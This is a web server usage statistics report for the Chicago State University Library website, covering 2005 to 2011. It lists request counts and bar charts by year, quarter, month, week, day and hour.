Web Server Statistics for Chicago State University Library, All Usage

Program started at Mon-22-Aug-2011 12:14.
Analysed requests from Sat-03-Sep-2005 17:52 to Thu-18-Aug-2011 16:33 (2174.95 days).

General Summary

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report contains overall statistics.

Figures in parentheses refer to the 7-day period ending 22-Aug-2011 12:14.

Successful requests: 2,328,221 (5,911)
Average successful requests per day: 1,070 (844)
Successful requests for pages: 2,222,229 (4,945)
Average successful requests for pages per day: 1,021 (706)
Failed requests: 342,954 (342)
Redirected requests: 43,617 (130)
Distinct files requested: 24,241 (982)
Distinct hosts served: 135,722 (911)
Corrupt logfile lines: 7,583,035
Unwanted logfile entries: 25,593,934
Data transferred: 51.44 gigabytes (81.92 megabytes)
Average data transferred per day: 24.22 megabytes (11.70 megabytes)

Yearly Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the activity in each year.

Each unit (+) represents 15,000 requests for pages or part thereof.

yearreqspages 
20058670084134++++++
2006493072483209+++++++++++++++++++++++++++++++++
2007422057409696++++++++++++++++++++++++++++
2008379821360390+++++++++++++++++++++++++
200900
2010557251526425++++++++++++++++++++++++++++++++++++
2011389320358375++++++++++++++++++++++++

Busiest year: 2010 (526,425 requests for pages).

Quarterly Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the activity in each quarter.

Each unit (+) represents 6,000 requests for pages or part thereof.

quarterreqspages 
Jul–Sep 20052786027121+++++
Oct–Dec 20055884057013++++++++++
    
Jan–Mar 2006168535165867++++++++++++++++++++++++++++
Apr–Jun 2006134488132570+++++++++++++++++++++++
Jul–Sep 20068269479762++++++++++++++
Oct–Dec 2006107355105010++++++++++++++++++
    
Jan–Mar 2007122116120146+++++++++++++++++++++
Apr–Jun 200710163698692+++++++++++++++++
Jul–Sep 20079079487915+++++++++++++++
Oct–Dec 2007107511102943++++++++++++++++++
    
Jan–Mar 20089980095688++++++++++++++++
Apr–Jun 2008141985134738+++++++++++++++++++++++
Jul–Sep 2008138036129964++++++++++++++++++++++
Oct–Dec 200800
    
Jan–Mar 200900
Apr–Jun 200900
Jul–Sep 200900
Oct–Dec 200900
    
Jan–Mar 20101231011626++
Apr–Jun 2010181019171214+++++++++++++++++++++++++++++
Jul–Sep 2010187877175788++++++++++++++++++++++++++++++
Oct–Dec 2010176045167797++++++++++++++++++++++++++++
    
Jan–Mar 2011152758143542++++++++++++++++++++++++
Apr–Jun 2011156306142680++++++++++++++++++++++++
Jul–Sep 20118025672153+++++++++++++

Busiest quarter: Jul–Sep 2010 (175,788 requests for pages).

Monthly Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the activity in each month.

Each unit (+) represents 2,500 requests for pages or part thereof.

monthreqspages 
Sep 20052786027121+++++++++++
Oct 20052897128126++++++++++++
Nov 20052468724091++++++++++
Dec 200551824796++
    
Jan 20064634245387+++++++++++++++++++
Feb 20065743156609+++++++++++++++++++++++
Mar 20066476263871++++++++++++++++++++++++++
Apr 20066166661039+++++++++++++++++++++++++
May 20064056339861++++++++++++++++
Jun 20063225931670+++++++++++++
Jul 20063475334099++++++++++++++
Aug 20061876117684++++++++
Sep 20062918027979++++++++++++
Oct 20064087640113+++++++++++++++++
Nov 20064297242075+++++++++++++++++
Dec 20062350722822++++++++++
    
Jan 20073611235564+++++++++++++++
Feb 20074122240522+++++++++++++++++
Mar 20074478244060++++++++++++++++++
Apr 20074367442600++++++++++++++++++
May 20072714226291+++++++++++
Jun 20073082029801++++++++++++
Jul 20072442723512++++++++++
Aug 20072706026185+++++++++++
Sep 20073930738218++++++++++++++++
Oct 20074075539248++++++++++++++++
Nov 20074634744425++++++++++++++++++
Dec 20072040919270++++++++
    
Jan 20083009628651++++++++++++
Feb 20083507033735++++++++++++++
Mar 20083463433302++++++++++++++
Apr 20085185848906++++++++++++++++++++
May 20084617344109++++++++++++++++++
Jun 20084395441723+++++++++++++++++
Jul 20085023146891+++++++++++++++++++
Aug 20085686353625++++++++++++++++++++++
Sep 20083094229448++++++++++++
Oct 200800
Nov 200800
Dec 200800
    
Jan 200900
Feb 200900
Mar 200900
Apr 200900
May 200900
Jun 200900
Jul 200900
Aug 200900
Sep 200900
Oct 200900
Nov 200900
Dec 200900
    
Jan 201000
Feb 201000
Mar 20101231011626+++++
Apr 20107012566879+++++++++++++++++++++++++++
May 20106195058806++++++++++++++++++++++++
Jun 20104894445529+++++++++++++++++++
Jul 20104447941952+++++++++++++++++
Aug 20105393549408++++++++++++++++++++
Sep 20108946384428++++++++++++++++++++++++++++++++++
Oct 20107556472197+++++++++++++++++++++++++++++
Nov 20106441861650+++++++++++++++++++++++++
Dec 20103606333950++++++++++++++
    
Jan 20113997936666+++++++++++++++
Feb 20115299350312+++++++++++++++++++++
Mar 20115978656564+++++++++++++++++++++++
Apr 20116334460160+++++++++++++++++++++++++
May 20114212238604++++++++++++++++
Jun 20115084043916++++++++++++++++++
Jul 20115050346255+++++++++++++++++++
Aug 20112975325898+++++++++++

Busiest month: Sep 2010 (84,428 requests for pages).

Weekly Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the activity in each week.

Each unit (+) represents 800 requests for pages or part thereof.

week beg.reqspages 
28/Aug/05130129+
4/Sep/0566306491+++++++++
11/Sep/0567106518+++++++++
18/Sep/0563246173++++++++
25/Sep/0587238445+++++++++++
2/Oct/0559475773++++++++
9/Oct/0564476256++++++++
16/Oct/0565186313++++++++
23/Oct/0571026933+++++++++
30/Oct/0569896809+++++++++
6/Nov/0552415132+++++++
13/Nov/0563986188++++++++
20/Nov/0570516910+++++++++
27/Nov/0513081268++
4/Dec/0500
11/Dec/0577+
18/Dec/0525032315+++
25/Dec/0526722474++++
1/Jan/0638413614+++++
8/Jan/061212911838+++++++++++++++
15/Jan/061163611479+++++++++++++++
22/Jan/061396113769++++++++++++++++++
29/Jan/061348113302+++++++++++++++++
5/Feb/061482214623+++++++++++++++++++
12/Feb/061453214285++++++++++++++++++
19/Feb/061308112914+++++++++++++++++
26/Feb/061426514024++++++++++++++++++
5/Mar/061385113546+++++++++++++++++
12/Mar/061580315624++++++++++++++++++++
19/Mar/061394313786++++++++++++++++++
26/Mar/061425314102++++++++++++++++++
2/Apr/061380713653++++++++++++++++++
9/Apr/061872718604++++++++++++++++++++++++
16/Apr/061344513329+++++++++++++++++
23/Apr/061333013139+++++++++++++++++
30/Apr/061069510554++++++++++++++
7/May/0680457950++++++++++
14/May/0692189069++++++++++++
21/May/0692118969++++++++++++
28/May/0679767833++++++++++
4/Jun/0693449223++++++++++++
11/Jun/0670856907+++++++++
18/Jun/0657175605++++++++
25/Jun/0676457496++++++++++
2/Jul/0655225416+++++++
9/Jul/061069710459++++++++++++++
16/Jul/0666746546+++++++++
23/Jul/0691949048++++++++++++
30/Jul/0676487416++++++++++
6/Aug/06564552+
13/Aug/0600
20/Aug/0659245665++++++++
27/Aug/0681857572++++++++++
3/Sep/0663706214++++++++
10/Sep/0686618085+++++++++++
17/Sep/0686338357+++++++++++
24/Sep/0638023632+++++
1/Oct/0674507328++++++++++
8/Oct/0689528734+++++++++++
15/Oct/0696749545++++++++++++
22/Oct/061090310697++++++++++++++
29/Oct/0690838892++++++++++++
5/Nov/0698449639+++++++++++++
12/Nov/061186611603+++++++++++++++
19/Nov/0665966476+++++++++
26/Nov/061109410861++++++++++++++
3/Dec/0678677757++++++++++
10/Dec/0646024496++++++
17/Dec/0650234783++++++
24/Dec/0641253930+++++
31/Dec/0641644080++++++
7/Jan/0773307249++++++++++
14/Jan/0774147328++++++++++
21/Jan/0794939330++++++++++++
28/Jan/071329613065+++++++++++++++++
4/Feb/071023610060+++++++++++++
11/Feb/071048310227+++++++++++++
18/Feb/0788678751+++++++++++
25/Feb/07100529933+++++++++++++
4/Mar/0767966636+++++++++
11/Mar/071121611031++++++++++++++
18/Mar/071322813066+++++++++++++++++
25/Mar/0798179659+++++++++++++
1/Apr/071075610613++++++++++++++
8/Apr/071322212845+++++++++++++++++
15/Apr/07102749966+++++++++++++
22/Apr/0777647569++++++++++
29/Apr/0774447253++++++++++
6/May/0753935176+++++++
13/May/0774597223++++++++++
20/May/0750664920+++++++
27/May/0748364658++++++
3/Jun/0772837024+++++++++
10/Jun/07100149745+++++++++++++
17/Jun/0758735652++++++++
24/Jun/0762526048++++++++
1/Jul/0753055057+++++++
8/Jul/0753095149+++++++
15/Jul/0757925616++++++++
22/Jul/0757945540+++++++
29/Jul/0726022517++++
5/Aug/0717761714+++
12/Aug/0750334805+++++++
19/Aug/071186711519+++++++++++++++
26/Aug/0788048538+++++++++++
2/Sep/0781887969++++++++++
9/Sep/071122310881++++++++++++++
16/Sep/0785598312+++++++++++
23/Sep/0794409207++++++++++++
30/Sep/0790618775+++++++++++
7/Oct/0782617998++++++++++
14/Oct/0798549478++++++++++++
21/Oct/0781647841++++++++++
28/Oct/0798499405++++++++++++
4/Nov/071186711384+++++++++++++++
11/Nov/071410313494+++++++++++++++++
18/Nov/0781037750++++++++++
25/Nov/0796989363++++++++++++
2/Dec/0773377016+++++++++
9/Dec/0741243834+++++
16/Dec/0733903181++++
23/Dec/0734563213+++++
30/Dec/0750704773++++++
6/Jan/0866176306++++++++
13/Jan/0870546661+++++++++
20/Jan/0864826275++++++++
27/Jan/0880887730++++++++++
3/Feb/0899159584++++++++++++
10/Feb/0878317513++++++++++
17/Feb/0875777232++++++++++
24/Feb/0883688090+++++++++++
2/Mar/0887408439+++++++++++
9/Mar/0889168580+++++++++++
16/Mar/0861735880++++++++
23/Mar/0880377731++++++++++
30/Mar/0883758003+++++++++++
6/Apr/0891928829++++++++++++
13/Apr/081351012104++++++++++++++++
20/Apr/081259512045++++++++++++++++
27/Apr/081657516013+++++++++++++++++++++
4/May/081503814479+++++++++++++++++++
11/May/08101049618+++++++++++++
18/May/0882567815++++++++++
25/May/0866646305++++++++
1/Jun/0886358287+++++++++++
8/Jun/08102979932+++++++++++++
15/Jun/08104049943+++++++++++++
22/Jun/08105959851+++++++++++++
29/Jun/08104489661+++++++++++++
6/Jul/081173310943++++++++++++++
13/Jul/081168110923++++++++++++++
20/Jul/081262711790+++++++++++++++
27/Jul/0894288859++++++++++++
3/Aug/08103299651+++++++++++++
10/Aug/0896398871++++++++++++
17/Aug/081268011976+++++++++++++++
24/Aug/082134020450++++++++++++++++++++++++++
31/Aug/081885217969+++++++++++++++++++++++
7/Sep/081330212581++++++++++++++++
14/Sep/0800
21/Sep/0800
28/Sep/0800
5/Oct/0800
12/Oct/0800
19/Oct/0800
26/Oct/0800
2/Nov/0800
9/Nov/0800
16/Nov/0800
23/Nov/0800
30/Nov/0800
7/Dec/0800
14/Dec/0800
21/Dec/0800
28/Dec/0800
4/Jan/0900
11/Jan/0900
18/Jan/0900
25/Jan/0900
1/Feb/0900
8/Feb/0900
15/Feb/0900
22/Feb/0900
1/Mar/0900
8/Mar/0900
15/Mar/0900
22/Mar/0900
29/Mar/0900
5/Apr/0900
12/Apr/0900
19/Apr/0900
26/Apr/0900
3/May/0900
10/May/0900
17/May/0900
24/May/0900
31/May/0900
7/Jun/0900
14/Jun/0900
21/Jun/0900
28/Jun/0900
5/Jul/0900
12/Jul/0900
19/Jul/0900
26/Jul/0900
2/Aug/0900
9/Aug/0900
16/Aug/0900
23/Aug/0900
30/Aug/0900
6/Sep/0900
13/Sep/0900
20/Sep/0900
27/Sep/0900
4/Oct/0900
11/Oct/0900
18/Oct/0900
25/Oct/0900
1/Nov/0900
8/Nov/0900
15/Nov/0900
22/Nov/0900
29/Nov/0900
6/Dec/0900
13/Dec/0900
20/Dec/0900
27/Dec/0900
3/Jan/1000
10/Jan/1000
17/Jan/1000
24/Jan/1000
31/Jan/1000
7/Feb/1000
14/Feb/1000
21/Feb/1000
28/Feb/1000
7/Mar/1022+
14/Mar/1000
21/Mar/1026432477++++
28/Mar/101504914236++++++++++++++++++
4/Apr/101776716908++++++++++++++++++++++
11/Apr/101607915307++++++++++++++++++++
18/Apr/101659115865++++++++++++++++++++
25/Apr/101666515972++++++++++++++++++++
2/May/101783716986++++++++++++++++++++++
9/May/101535914611+++++++++++++++++++
16/May/101594715273++++++++++++++++++++
23/May/1083787788++++++++++
30/May/10104419757+++++++++++++
6/Jun/101104910508++++++++++++++
13/Jun/10105339823+++++++++++++
20/Jun/101186110602++++++++++++++
27/Jun/101126410615++++++++++++++
4/Jul/101369612890+++++++++++++++++
11/Jul/1082827951++++++++++
18/Jul/1092928714+++++++++++
25/Jul/1090738507+++++++++++
1/Aug/10101699612+++++++++++++
8/Aug/1084628160+++++++++++
15/Aug/1094948665+++++++++++
22/Aug/101687214785+++++++++++++++++++
29/Aug/101902817548++++++++++++++++++++++
5/Sep/101747616479+++++++++++++++++++++
12/Sep/102685025822+++++++++++++++++++++++++++++++++
19/Sep/102096319473+++++++++++++++++++++++++
26/Sep/101825117299++++++++++++++++++++++
3/Oct/102181821005+++++++++++++++++++++++++++
10/Oct/101819817392++++++++++++++++++++++
17/Oct/101493614270++++++++++++++++++
24/Oct/101529914444+++++++++++++++++++
31/Oct/101398013406+++++++++++++++++
7/Nov/101613315408++++++++++++++++++++
14/Nov/101607315430++++++++++++++++++++
21/Nov/101248611888+++++++++++++++
28/Nov/101432013729++++++++++++++++++
5/Dec/101180311268+++++++++++++++
12/Dec/1074366869+++++++++
19/Dec/1053434911+++++++
26/Dec/1043514039++++++
2/Jan/1172305898++++++++
9/Jan/1152954844+++++++
16/Jan/1188648290+++++++++++
23/Jan/111463613891++++++++++++++++++
30/Jan/111256912014++++++++++++++++
6/Feb/111127010699++++++++++++++
13/Feb/111491614053++++++++++++++++++
20/Feb/111425413561+++++++++++++++++
27/Feb/111409313295+++++++++++++++++
6/Mar/111447113745++++++++++++++++++
13/Mar/11105009861+++++++++++++
20/Mar/111346212869+++++++++++++++++
27/Mar/111455713669++++++++++++++++++
3/Apr/111423013533+++++++++++++++++
10/Apr/111479814067++++++++++++++++++
17/Apr/111575415029+++++++++++++++++++
24/Apr/111490514115++++++++++++++++++
1/May/111470013815++++++++++++++++++
8/May/11104369340++++++++++++
15/May/1175356947+++++++++
22/May/1167926064++++++++
29/May/1173616723+++++++++
5/Jun/111228611445+++++++++++++++
12/Jun/111195010059+++++++++++++
19/Jun/111235710162+++++++++++++
26/Jun/111196910119+++++++++++++
3/Jul/111137710463++++++++++++++
10/Jul/111180610910++++++++++++++
17/Jul/111180911088++++++++++++++
24/Jul/111216310805++++++++++++++
31/Jul/111261611333+++++++++++++++
7/Aug/11105069023++++++++++++
14/Aug/1175556377++++++++

Busiest week: week beginning 12/Sep/10 (25,822 requests for pages).

Daily Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the activity in each day.

Each unit (+) represents 60 requests for pages or part thereof.

datereqspages 
8/Jul/1118151626++++++++++++++++++++++++++++
9/Jul/1113891247+++++++++++++++++++++
    
10/Jul/1114681273++++++++++++++++++++++
11/Jul/1124492206+++++++++++++++++++++++++++++++++++++
12/Jul/1118171733+++++++++++++++++++++++++++++
13/Jul/1114281380+++++++++++++++++++++++
14/Jul/1119131775++++++++++++++++++++++++++++++
15/Jul/1115701499+++++++++++++++++++++++++
16/Jul/1111611044++++++++++++++++++
    
17/Jul/1111931093+++++++++++++++++++
18/Jul/1115531450+++++++++++++++++++++++++
19/Jul/1117791681+++++++++++++++++++++++++++++
20/Jul/1117691687+++++++++++++++++++++++++++++
21/Jul/1120641918++++++++++++++++++++++++++++++++
22/Jul/1121662089+++++++++++++++++++++++++++++++++++
23/Jul/1112851170++++++++++++++++++++
    
24/Jul/1114131089+++++++++++++++++++
25/Jul/1124611970+++++++++++++++++++++++++++++++++
26/Jul/1119761817+++++++++++++++++++++++++++++++
27/Jul/1117961739+++++++++++++++++++++++++++++
28/Jul/1119321824+++++++++++++++++++++++++++++++
29/Jul/1113901290++++++++++++++++++++++
30/Jul/1111951076++++++++++++++++++
    
31/Jul/11924835++++++++++++++
1/Aug/1116391453+++++++++++++++++++++++++
2/Aug/1123322090+++++++++++++++++++++++++++++++++++
3/Aug/1124692265++++++++++++++++++++++++++++++++++++++
4/Aug/1120621760++++++++++++++++++++++++++++++
5/Aug/1119691794++++++++++++++++++++++++++++++
6/Aug/1112211136+++++++++++++++++++
    
7/Aug/11905829++++++++++++++
8/Aug/1121251988++++++++++++++++++++++++++++++++++
9/Aug/1118341657++++++++++++++++++++++++++++
10/Aug/1114121292++++++++++++++++++++++
11/Aug/111190991+++++++++++++++++
12/Aug/1121511435++++++++++++++++++++++++
13/Aug/11889831++++++++++++++
    
14/Aug/111129954++++++++++++++++
15/Aug/1112201086+++++++++++++++++++
16/Aug/1116721431++++++++++++++++++++++++
17/Aug/1122411742++++++++++++++++++++++++++++++
18/Aug/1112931164++++++++++++++++++++

Busiest day: 17/Sep/10 (6,795 requests for pages).

Daily Summary

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the total activity for each day of the week, summed over all the weeks in the report.

Each unit (+) represents 10,000 requests for pages or part thereof.

dayreqspages 
Sun218455206679+++++++++++++++++++++
Mon399535381515+++++++++++++++++++++++++++++++++++++++
Tue408292390728++++++++++++++++++++++++++++++++++++++++
Wed399436382556+++++++++++++++++++++++++++++++++++++++
Thu377511360849+++++++++++++++++++++++++++++++++++++
Fri303683288678+++++++++++++++++++++++++++++
Sat221309211224++++++++++++++++++++++

Hourly Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the activity in each hour.

Each unit (+) represents 10 requests for pages or part thereof.

timereqspages 
15/Aug/11 17:00–18:004340++++
15/Aug/11 18:00–19:004636++++
15/Aug/11 19:00–20:004745+++++
15/Aug/11 20:00–21:002827+++
15/Aug/11 21:00–22:005050+++++
15/Aug/11 22:00–23:002525+++
15/Aug/11 23:00–24:003333++++
    
16/Aug/11 00:00–01:002120++
16/Aug/11 01:00–02:009652++++++
16/Aug/11 02:00–03:002726+++
16/Aug/11 03:00–04:002220++
16/Aug/11 04:00–05:003230+++
16/Aug/11 05:00–06:003029+++
16/Aug/11 06:00–07:002423+++
16/Aug/11 07:00–08:005148+++++
16/Aug/11 08:00–09:009080++++++++
16/Aug/11 09:00–10:009589+++++++++
16/Aug/11 10:00–11:006261+++++++
16/Aug/11 11:00–12:007068+++++++
16/Aug/11 12:00–13:00121110+++++++++++
16/Aug/11 13:00–14:0010196++++++++++
16/Aug/11 14:00–15:00191137++++++++++++++
16/Aug/11 15:00–16:00222139++++++++++++++
16/Aug/11 16:00–17:006563+++++++
16/Aug/11 17:00–18:009692++++++++++
16/Aug/11 18:00–19:004338++++
16/Aug/11 19:00–20:003636++++
16/Aug/11 20:00–21:006361+++++++
16/Aug/11 21:00–22:003736++++
16/Aug/11 22:00–23:003939++++
16/Aug/11 23:00–24:003838++++
    
17/Aug/11 00:00–01:003329+++
17/Aug/11 01:00–02:007473++++++++
17/Aug/11 02:00–03:002928+++
17/Aug/11 03:00–04:002625+++
17/Aug/11 04:00–05:003535++++
17/Aug/11 05:00–06:004340++++
17/Aug/11 06:00–07:002523+++
17/Aug/11 07:00–08:003634++++
17/Aug/11 08:00–09:007474++++++++
17/Aug/11 09:00–10:00272147+++++++++++++++
17/Aug/11 10:00–11:00543265+++++++++++++++++++++++++++
17/Aug/11 11:00–12:00247216++++++++++++++++++++++
17/Aug/11 12:00–13:009892++++++++++
17/Aug/11 13:00–14:00124109+++++++++++
17/Aug/11 14:00–15:008577++++++++
17/Aug/11 15:00–16:009789+++++++++
17/Aug/11 16:00–17:006866+++++++
17/Aug/11 17:00–18:004543+++++
17/Aug/11 18:00–19:003937++++
17/Aug/11 19:00–20:002726+++
17/Aug/11 20:00–21:003835++++
17/Aug/11 21:00–22:003333++++
17/Aug/11 22:00–23:00115115++++++++++++
17/Aug/11 23:00–24:003531++++
    
18/Aug/11 00:00–01:002926+++
18/Aug/11 01:00–02:002216++
18/Aug/11 02:00–03:001514++
18/Aug/11 03:00–04:001212++
18/Aug/11 04:00–05:003838++++
18/Aug/11 05:00–06:002626+++
18/Aug/11 06:00–07:003332++++
18/Aug/11 07:00–08:00198196++++++++++++++++++++
18/Aug/11 08:00–09:00118117++++++++++++
18/Aug/11 09:00–10:00107105+++++++++++
18/Aug/11 10:00–11:00127111++++++++++++
18/Aug/11 11:00–12:008079++++++++
18/Aug/11 12:00–13:007973++++++++
18/Aug/11 13:00–14:008682+++++++++
18/Aug/11 14:00–15:009289+++++++++
18/Aug/11 15:00–16:00194112++++++++++++
18/Aug/11 16:00–17:003736++++

Busiest hour: 18/May/10 01:00–02:00 (2,914 requests for pages).

Hour of the Week Summary

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the total activity for each hour of the week, summed over all the weeks in the report.

Each unit (+) represents 1,000 requests for pages or part thereof.

hourreqspages 
Sun 00:00–01:0062745943++++++
Sun 01:00–02:0057025383++++++
Sun 02:00–03:0051094811+++++
Sun 03:00–04:0053275076++++++
Sun 04:00–05:0050704718+++++
Sun 05:00–06:0047884516+++++
Sun 06:00–07:0049664625+++++
Sun 07:00–08:0058365483++++++
Sun 08:00–09:0089587879++++++++
Sun 09:00–10:0078227280++++++++
Sun 10:00–11:0088828475+++++++++
Sun 11:00–12:0088618242+++++++++
Sun 12:00–13:0093538835+++++++++
Sun 13:00–14:0093558799+++++++++
Sun 14:00–15:001192911404++++++++++++
Sun 15:00–16:001270012214+++++++++++++
Sun 16:00–17:001343412821+++++++++++++
Sun 17:00–18:001237711902++++++++++++
Sun 18:00–19:001368913165++++++++++++++
Sun 19:00–20:001298512438+++++++++++++
Sun 20:00–21:001329212590+++++++++++++
Sun 21:00–22:001195611345++++++++++++
Sun 22:00–23:001065910130+++++++++++
Sun 23:00–24:0091318605+++++++++
    
Mon 00:00–01:0069546591+++++++
Mon 01:00–02:0075107085++++++++
Mon 02:00–03:0064256071+++++++
Mon 03:00–04:0056805307++++++
Mon 04:00–05:0056325222++++++
Mon 05:00–06:0053764966+++++
Mon 06:00–07:0058015400++++++
Mon 07:00–08:0072096821+++++++
Mon 08:00–09:001333912717+++++++++++++
Mon 09:00–10:001938818572+++++++++++++++++++
Mon 10:00–11:002543524489+++++++++++++++++++++++++
Mon 11:00–12:002915127668++++++++++++++++++++++++++++
Mon 12:00–13:002733726284+++++++++++++++++++++++++++
Mon 13:00–14:002792626776+++++++++++++++++++++++++++
Mon 14:00–15:002702525904++++++++++++++++++++++++++
Mon 15:00–16:003006628455+++++++++++++++++++++++++++++
Mon 16:00–17:002450423620++++++++++++++++++++++++
Mon 17:00–18:002110920331+++++++++++++++++++++
Mon 18:00–19:002119120426+++++++++++++++++++++
Mon 19:00–20:001947218742+++++++++++++++++++
Mon 20:00–21:001804217256++++++++++++++++++
Mon 21:00–22:001935518416+++++++++++++++++++
Mon 22:00–23:001516714517+++++++++++++++
Mon 23:00–24:00104419879++++++++++
    
Tue 00:00–01:0076677209++++++++
Tue 01:00–02:0096509140++++++++++
Tue 02:00–03:0064936074+++++++
Tue 03:00–04:0057715427++++++
Tue 04:00–05:0069826653+++++++
Tue 05:00–06:0057915521++++++
Tue 06:00–07:0060455645++++++
Tue 07:00–08:0079117407++++++++
Tue 08:00–09:001413313467++++++++++++++
Tue 09:00–10:002259121806++++++++++++++++++++++
Tue 10:00–11:002575224843+++++++++++++++++++++++++
Tue 11:00–12:002829326945+++++++++++++++++++++++++++
Tue 12:00–13:003057429169++++++++++++++++++++++++++++++
Tue 13:00–14:002853627529++++++++++++++++++++++++++++
Tue 14:00–15:002924628221+++++++++++++++++++++++++++++
Tue 15:00–16:002859927384++++++++++++++++++++++++++++
Tue 16:00–17:002644425342++++++++++++++++++++++++++
Tue 17:00–18:002275121874++++++++++++++++++++++
Tue 18:00–19:001995719279++++++++++++++++++++
Tue 19:00–20:002034519500++++++++++++++++++++
Tue 20:00–21:001711316423+++++++++++++++++
Tue 21:00–22:001515914477+++++++++++++++
Tue 22:00–23:001225511671++++++++++++
Tue 23:00–24:00102349722++++++++++
    
Wed 00:00–01:0071156733+++++++
Wed 01:00–02:0060285728++++++
Wed 02:00–03:0058095426++++++
Wed 03:00–04:0054805128++++++
Wed 04:00–05:0057735513++++++
Wed 05:00–06:0070246711+++++++
Wed 06:00–07:0068766556+++++++
Wed 07:00–08:0076657222++++++++
Wed 08:00–09:001380713348++++++++++++++
Wed 09:00–10:002088819805++++++++++++++++++++
Wed 10:00–11:002640824950+++++++++++++++++++++++++
Wed 11:00–12:002972228638+++++++++++++++++++++++++++++
Wed 12:00–13:002931028215+++++++++++++++++++++++++++++
Wed 13:00–14:002764026395+++++++++++++++++++++++++++
Wed 14:00–15:002811026909+++++++++++++++++++++++++++
Wed 15:00–16:002756426433+++++++++++++++++++++++++++
Wed 16:00–17:002625525340++++++++++++++++++++++++++
Wed 17:00–18:002241321786++++++++++++++++++++++
Wed 18:00–19:001992219250++++++++++++++++++++
Wed 19:00–20:001826217661++++++++++++++++++
Wed 20:00–21:001780817070++++++++++++++++++
Wed 21:00–22:001619515526++++++++++++++++
Wed 22:00–23:001243111778++++++++++++
Wed 23:00–24:001093110435+++++++++++
    
Thu 00:00–01:0098719396++++++++++
Thu 01:00–02:0072636907+++++++
Thu 02:00–03:0068056493+++++++
Thu 03:00–04:0061085869++++++
Thu 04:00–05:0068596533+++++++
